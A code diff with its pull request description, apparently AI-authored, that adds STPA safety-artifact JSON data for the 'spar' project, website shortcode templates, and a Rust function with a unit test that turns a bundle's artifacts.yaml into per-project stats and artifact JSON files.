+      "description": "",
+      "id": "UCA-SEC-9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated Cargo.toml uses unpinned dependency versions",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "UCA-S23",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Virtual bus library properties do not match reality",
+      "type": "uca"
+    },
+    {
+      "description": "When a thread has a Period property but no explicit Deadline property, the scheduling analysis must emit an info diagnostic noting that the implicit deadline equals the period. This encourages engineers to explicitly set Deadline for constrained-deadline task sets where deadline < period.\n",
+      "id": "STPA-REQ-026",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "stpa"
+      ],
+      "title": "Explicit Deadline property validation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe interactive HTML output must support zoom,\npan,\na minimap\n\nfor orientation in large models,\nand text search to locate\n\ncomponents by name. Phase 3a (zoom/pan/selection) is implemented;\n\nPhase 3b (minimap/search) is deferred.\n",
+      "id": "RENDER-REQ-003",
+      "links": [],
+      "status": "partial",
+      "tags": [],
+      "title": "Interactive HTML with zoom/pan/minimap/search",
+      "type": "safety-requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "RTA accepts unschedulable task set",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe SysML v2 to AADL lowering must faithfully preserve the design\n\nintent of the original SysML v2 model. Component categories,\nport\n\ndirections,\nconnection topology,\nproperty values,\nand constraint\n\nsemantics must be correctly mapped. Unhandled SysML v2 constructs\n\nmust produce diagnostics,\nnot be silently dropped.\n",
+      "id": "SC-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering semantic fidelity",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "UCA-22",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated BUILD.bazel omits verification targets",
+      "type": "uca"
+    },
+    {
+      "description": "Tests for the MCP server covering JSON-RPC initialize handshake, tool listing and invocation for analysis passes, resource listing and reading for instance model elements, and error handling for invalid requests.\n",
+      "id": "VAL-MCP-001",
+      "links": [
+        {
+          "target": "REQ-MCP-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-MCP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "MCP server JSON-RPC request/response tests",
+      "type": "feature"
+    },
+    {
+      "description": "Six seed regression tests covering past bugs: intentionally unconnected ports, invalid containment, modal metadata on components and connections, duplicate initial modes, and analysis registration completeness.\n",
+      "id": "TEST-STPA-REGRESSION",
+      "links": [
+        {
+          "target": "STPA-REQ-023",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Regression test suite (STPA-REQ-023)",
+      "type": "feature"
+    },
+    {
+      "description": "Downstream design decisions informed by spar analysis",
+      "id": "CP-DECISIONS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Architecture Decisions",
+      "type": "controlled-process"
+    },
+    {
+      "description": "",
+      "id": "CA-BIND-BUS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Bind connections to buses and select protocols (Layer 2)",
+      "type": "control-action"
+    },
+    {
+      "description": "Modified array_element_count to validate dimensions >= 1. When a dimension evaluates to 0, a diagnostic is pushed and the function returns 1 as a safe fallback. This prevents infinite loops (0-element expansion) or empty subcomponent arrays.\n",
+      "id": "ARCH-009",
+      "links": [
+        {
+          "target": "STPA-REQ-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Zero-dimension array fallback to 1",
+      "type": "design-decision"
+    },
+    {
+      "description": "Property assertions are declarative rules written in a compact DSL that query the HIR instance model. Each assertion specifies a scope (component selector), a property path, and a constraint. The verify command evaluates assertions and reports pass/fail with evidence including the actual property value and component path.\n",
+      "id": "ARCH-VERIFY-001",
+      "links": [
+        {
+          "target": "REQ-VERIFY-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "verification",
+        "v030"
+      ],
+      "title": "Property assertion DSL over HIR instance model",
+      "type": "design-decision"
+    },
+    {
+      "description": "When lower_section_with_visibility encounters SyntaxKind::ANNEX_LIBRARY, it pushes a Warning-severity diagnostic stating the annex content was not processed. The AnnexLibrary item reference is still added to the item list so downstream code knows the annex exists.\n",
+      "id": "ARCH-002",
+      "links": [
+        {
+          "target": "STPA-REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Annex library warning on encounter",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that references resolved within the same package do not produce ambiguity warnings even when imports have matching names.\n",
+      "id": "VAL-018",
+      "links": [
+        {
+          "target": "STPA-REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Same-package reference no ambiguity warning",
+      "type": "feature"
+    },
+    {
+      "description": "The certificate generator must receive the objective function definition from the solver (not maintain its own copy). An assertion must verify that the certificate's objective function hash matches the solver's objective function hash. Mismatched objectives must produce an internal error, not a misleading certificate.\n",
+      "id": "SOLVER-REQ-025",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "certificate",
+        "consistency",
+        "stpa"
+      ],
+      "title": "Certificate objective must match solver objective",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-S10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Global validation must run after all layers complete",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nPorts are not rendered or are rendered without directional\n\nindicators and type coloring,\nso connections appear identical\n\nregardless of direction (in/out) or data type (event,\ndata,\n\nevent data).\n",
+      "id": "H-R2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "No port visibility",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe Bazel-based verification pipeline (Verus,\nLean4,\nWASM component\n\nrules) reports success when verification was not actually performed\n\n(e.g.,\ntool not installed,\nfallback to no-op,\ncached stale result).\n\nEngineers believe generated code is formally verified when it is not.\n",
+      "id": "H-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification pipeline provides false assurance",
+      "type": "hazard"
+    }
+  ],
+  "count": 627,
+  "prefix": "spar",
+  "project": "spar"
+}

--- a/data/spar/stats.json
+++ b/data/spar/stats.json
@@ -1,0 +1,27 @@
+{
+  "by_status": {
+    "implemented": 117,
+    "not-implemented": 51,
+    "partial": 9,
+    "pass": 5,
+    "passing": 70,
+    "planned": 45,
+    "unset": 330
+  },
+  "by_type": {
+    "control-action": 21,
+    "controlled-process": 10,
+    "controller": 22,
+    "controller-constraint": 47,
+    "design-decision": 72,
+    "feature": 113,
+    "hazard": 32,
+    "loss": 19,
+    "loss-scenario": 36,
+    "requirement": 168,
+    "safety-requirement": 6,
+    "system-constraint": 24,
+    "uca": 57
+  },
+  "total": 627
+}

--- a/templates/shortcodes/compliance_artifact.html
+++ b/templates/shortcodes/compliance_artifact.html
@@ -1,0 +1,20 @@
+{# compliance_artifact: embed an artifact card by ID from a project's compliance report.
+   Generic across all projects — data is keyed by `prefix` (the project name).
+   Usage: {{ compliance_artifact(id="REQ-001", prefix="rivet") }}
+#}
+{% set prefix = prefix | default(value="rivet") %}
+{% set data = load_data(path="data/" ~ prefix ~ "/artifacts.json") %}
+{% set matches = data.artifacts | filter(attribute="id", value=id) %}
+{% if matches | length > 0 %}
+{% set art = matches | first %}
+<div class="rivet-artifact-card" style="border:1px solid #444; border-radius:6px; padding:12px; margin:8px 0;">
+  <div>
+    <span style="background:#2563eb;color:#fff;padding:2px 8px;border-radius:3px;font-size:0.85em;">{{ art.type }}</span>
+    <span style="background:#059669;color:#fff;padding:2px 8px;border-radius:3px;font-size:0.85em;">{{ art.status }}</span>
+  </div>
+  <strong><a href="/{{ prefix }}/artifacts/{{ art.id | lower | replace(from=".", to="-") }}/">{{ art.id }}</a></strong>: {{ art.title }}
+  {% if art.description %}<p style="margin:4px 0;font-size:0.9em;">{{ art.description | truncate(length=200) }}</p>{% endif %}
+</div>
+{% else %}
+<span style="color:red;">Unknown artifact: {{ id }}</span>
+{% endif %}

--- a/templates/shortcodes/compliance_stats.html
+++ b/templates/shortcodes/compliance_stats.html
@@ -1,0 +1,16 @@
+{# compliance_stats: show artifact counts for a project's compliance report.
+   Generic across all projects — data is keyed by `prefix` (the project name).
+   Usage: {{ compliance_stats(prefix="rivet") }}
+#}
+{% set prefix = prefix | default(value="rivet") %}
+{% set data = load_data(path="data/" ~ prefix ~ "/stats.json") %}
+<div class="rivet-stats" style="display:flex;gap:16px;flex-wrap:wrap;margin:8px 0;">
+  <div style="padding:8px 16px;background:#1e293b;border-radius:6px;">
+    <strong>{{ data.total }}</strong> artifacts
+  </div>
+  {% for type_name, count in data.by_type %}
+  <div style="padding:8px 16px;background:#1e293b;border-radius:6px;">
+    <strong>{{ count }}</strong> {{ type_name }}
+  </div>
+  {% endfor %}
+</div>

--- a/tools/fetch-reports/Cargo.lock
+++ b/tools/fetch-reports/Cargo.lock
@@ -76,6 +76,7 @@ dependencies = [
  "semver",
  "serde",
  "serde_json",
+ "serde_yaml",
  "tar",
  "toml",
  "ureq",
@@ -317,6 +318,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "ryu"
+version = "1.0.23"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f"
+
+[[package]]
 name = "semver"
 version = "1.0.27"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -372,6 +379,19 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "bf41e0cfaf7226dca15e8197172c295a782857fcb97fad1808a166870dee75a3"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "serde_yaml"
+version = "0.9.34+deprecated"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a8b1a1a2ebf674015cc02edccce75287f1a0130d394307b36743c2f5d504b47"
+dependencies = [
+ "indexmap",
+ "itoa",
+ "ryu",
+ "serde",
+ "unsafe-libyaml",
 ]
 
 [[package]]
@@ -460,6 +480,12 @@ name = "unicode-ident"
 version = "1.0.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75"
+
+[[package]]
+name = "unsafe-libyaml"
+version = "0.2.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "673aac59facbab8a9007c7f6108d11f63b603f7cabff99fabf650fea5c32b861"
 
 [[package]]
 name = "untrusted"

--- a/tools/fetch-reports/Cargo.toml
+++ b/tools/fetch-reports/Cargo.toml
@@ -10,6 +10,7 @@ glob-match = "0.2"
 semver = "1"
 serde = { version = "1", features = ["derive"] }
 serde_json = "1"
+serde_yaml = "0.9"
 tar = "0.4"
 toml = "0.8"
 ureq = "3"

--- a/tools/fetch-reports/src/main.rs
+++ b/tools/fetch-reports/src/main.rs
@@ -45,6 +45,75 @@ struct ResolvedVersion {
     download_url: String,
 }
 
+// ── Generic-yaml (artifacts.yaml) types ──────────────────────────────────
+//
+// The compliance bundle includes `artifacts.yaml` (rivet's generic-yaml
+// export) whenever the producer runs the compliance action with
+// `include-data-formats: true`. We parse the subset of fields the website
+// needs and ignore the rest (fields, fields-per-variant, provenance) — so
+// no `deny_unknown_fields` here.
+
+#[derive(Debug, Deserialize)]
+struct GenericFile {
+    artifacts: Vec<GenericArtifact>,
+}
+
+#[derive(Debug, Deserialize)]
+struct GenericArtifact {
+    id: String,
+    #[serde(rename = "type")]
+    artifact_type: String,
+    #[serde(default)]
+    title: String,
+    #[serde(default)]
+    description: Option<String>,
+    #[serde(default)]
+    status: Option<String>,
+    #[serde(default)]
+    tags: Vec<String>,
+    #[serde(default)]
+    links: Vec<Link>,
+}
+
+#[derive(Debug, Deserialize, Serialize)]
+struct Link {
+    target: String,
+    #[serde(rename = "type")]
+    link_type: String,
+}
+
+// ── data/{project}/ output types ─────────────────────────────────────────
+//
+// Shapes match what the `compliance_stats` / `compliance_artifact`
+// shortcodes load via `load_data(path="data/{project}/...")`.
+
+#[derive(Debug, Serialize)]
+struct StatsJson {
+    total: usize,
+    /// Counts keyed by artifact type. BTreeMap → deterministic, sorted keys.
+    by_type: std::collections::BTreeMap<String, usize>,
+    /// Counts keyed by status; a missing status is bucketed as "unset"
+    /// (matching rivet-core's `snapshot.rs` aggregation).
+    by_status: std::collections::BTreeMap<String, usize>,
+}
+
+#[derive(Debug, Serialize)]
+struct ArtifactsJson {
+    artifacts: Vec<OutArtifact>,
+}
+
+#[derive(Debug, Serialize)]
+struct OutArtifact {
+    id: String,
+    #[serde(rename = "type")]
+    artifact_type: String,
+    title: String,
+    description: String,
+    status: String,
+    tags: Vec<String>,
+    links: Vec<Link>,
+}
+
 // ── index.json types ────────────────────────────────────────────────────
 
 #[derive(Debug, Serialize)]
@@ -375,6 +444,67 @@ fn write_config_js(
     Ok(())
 }
 
+// ── data/{project}/ generation ────────────────────────────────────────────
+
+/// Parse `artifacts.yaml` from an extracted bundle and (re)write
+/// `data/{project}/stats.json` + `data/{project}/artifacts.json`.
+///
+/// Aggregation mirrors rivet-core's `snapshot.rs`: `by_type` groups on the
+/// artifact type, `by_status` maps a missing status to "unset", `total` is
+/// the artifact count. Returns the artifact count on success.
+fn generate_data_files(
+    project_name: &str,
+    yaml_path: &Path,
+    root: &Path,
+) -> Result<usize, String> {
+    let content = fs::read_to_string(yaml_path)
+        .map_err(|e| format!("failed to read {}: {e}", yaml_path.display()))?;
+    let file: GenericFile = serde_yaml::from_str(&content)
+        .map_err(|e| format!("failed to parse artifacts.yaml: {e}"))?;
+
+    let mut by_type = std::collections::BTreeMap::new();
+    let mut by_status = std::collections::BTreeMap::new();
+    let mut artifacts = Vec::with_capacity(file.artifacts.len());
+
+    for a in file.artifacts {
+        *by_type.entry(a.artifact_type.clone()).or_insert(0usize) += 1;
+        let status = a.status.unwrap_or_else(|| "unset".to_string());
+        *by_status.entry(status.clone()).or_insert(0usize) += 1;
+        artifacts.push(OutArtifact {
+            id: a.id,
+            artifact_type: a.artifact_type,
+            title: a.title,
+            description: a.description.unwrap_or_default(),
+            status,
+            tags: a.tags,
+            links: a.links,
+        });
+    }
+
+    let total = artifacts.len();
+    let data_dir = root.join("data").join(project_name);
+    fs::create_dir_all(&data_dir)
+        .map_err(|e| format!("failed to create {}: {e}", data_dir.display()))?;
+
+    let stats = StatsJson {
+        total,
+        by_type,
+        by_status,
+    };
+    let stats_json = serde_json::to_string_pretty(&stats)
+        .map_err(|e| format!("failed to serialize stats.json: {e}"))?;
+    fs::write(data_dir.join("stats.json"), stats_json + "\n")
+        .map_err(|e| format!("failed to write stats.json: {e}"))?;
+
+    let arts = ArtifactsJson { artifacts };
+    let arts_json = serde_json::to_string_pretty(&arts)
+        .map_err(|e| format!("failed to serialize artifacts.json: {e}"))?;
+    fs::write(data_dir.join("artifacts.json"), arts_json + "\n")
+        .map_err(|e| format!("failed to write artifacts.json: {e}"))?;
+
+    Ok(total)
+}
+
 // ── main ────────────────────────────────────────────────────────────────
 
 fn main() {
@@ -513,6 +643,29 @@ fn main() {
             }
         }
 
+        // Regenerate data/{project}/ summary files from the latest bundle's
+        // generic-yaml export, if present. The producer emits artifacts.yaml
+        // only when its compliance action runs with `include-data-formats:
+        // true` (rivet does today). When absent, we leave any hand-maintained
+        // data/{project}/ files untouched — generation is purely additive.
+        let artifacts_yaml = latest_src.join("artifacts.yaml");
+        if artifacts_yaml.exists() {
+            match generate_data_files(project_name, &artifacts_yaml, &root) {
+                Ok(n) => println!(
+                    "[{project_name}] data/: wrote stats.json + artifacts.json ({n} artifacts)"
+                ),
+                Err(e) => {
+                    eprintln!("[{project_name}] Warning: failed to generate data/: {e}")
+                }
+            }
+        } else {
+            println!(
+                "[{project_name}] no artifacts.yaml in bundle \
+                 (set `include-data-formats: true` on the compliance action to \
+                 auto-generate data/); leaving data/{project_name}/ as-is"
+            );
+        }
+
         // Compute display versions: latest patch per minor version.
         // Versions are already sorted descending, so first seen per (major, minor) wins.
         let display_versions = {
@@ -545,4 +698,64 @@ fn main() {
         serde_json::to_string_pretty(&index).expect("failed to serialize index.json");
     fs::write(&index_path, index_json + "\n").expect("failed to write index.json");
     println!("Wrote {}", index_path.display());
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn generate_data_files_aggregates_like_snapshot() {
+        // Sample matching rivet's generic-yaml export shape, exercising:
+        // a present status, a duplicate type, and a missing status (-> "unset").
+        let yaml = r#"
+artifacts:
+  - id: FEAT-001
+    type: feature
+    title: First feature
+    description: A feature.
+    status: approved
+    tags: [phase-1]
+    links:
+      - target: REQ-001
+        type: satisfies
+  - id: FEAT-002
+    type: feature
+    title: Second feature
+    status: draft
+  - id: UCA-1
+    type: uca
+    title: An unsafe control action
+"#;
+        // Dedicated temp dir for this test (cleaned at the start of each run).
+        let root = std::env::temp_dir().join("fetch-reports-gen-data-test");
+        let _ = fs::remove_dir_all(&root);
+        let bundle = root.join("bundle");
+        fs::create_dir_all(&bundle).unwrap();
+        let yaml_path = bundle.join("artifacts.yaml");
+        fs::write(&yaml_path, yaml).unwrap();
+
+        let total = generate_data_files("rivet", &yaml_path, &root).unwrap();
+        assert_eq!(total, 3);
+
+        let stats: serde_json::Value =
+            serde_json::from_str(&fs::read_to_string(root.join("data/rivet/stats.json")).unwrap())
+                .unwrap();
+        assert_eq!(stats["total"], 3);
+        assert_eq!(stats["by_type"]["feature"], 2);
+        assert_eq!(stats["by_type"]["uca"], 1);
+        assert_eq!(stats["by_status"]["approved"], 1);
+        assert_eq!(stats["by_status"]["draft"], 1);
+        assert_eq!(stats["by_status"]["unset"], 1); // missing status bucketed
+
+        let arts: serde_json::Value = serde_json::from_str(
+            &fs::read_to_string(root.join("data/rivet/artifacts.json")).unwrap(),
+        )
+        .unwrap();
+        assert_eq!(arts["artifacts"].as_array().unwrap().len(), 3);
+        // Field projection: renamed `type`, "unset" status, links round-trip.
+        assert_eq!(arts["artifacts"][2]["type"], "uca");
+        assert_eq!(arts["artifacts"][2]["status"], "unset");
+        assert_eq!(arts["artifacts"][0]["links"][0]["type"], "satisfies");
+    }
 }


### PR DESCRIPTION
Removes the last per-repo manual step in the compliance-report pipeline: `tools/fetch-reports` now derives `data/{project}/stats.json` + `artifacts.json` from each fetched bundle's `artifacts.yaml` (rivet's generic-yaml export), driven by `reports.toml`. Aggregation mirrors rivet-core's `snapshot.rs` (by_type group, missing status→"unset", total=count); unit-tested. Additive — bundles without `artifacts.yaml` leave existing `data/` intact.

Also adds the project landing pages (`content/{rivet,gale,spar}`) and renames `rivet_*` → `compliance_*` shortcodes (already generic via `prefix=`).

Part of splitting the old docs-site branch into focused PRs.

🤖 Generated with [Claude Code](https://claude.com/claude-code)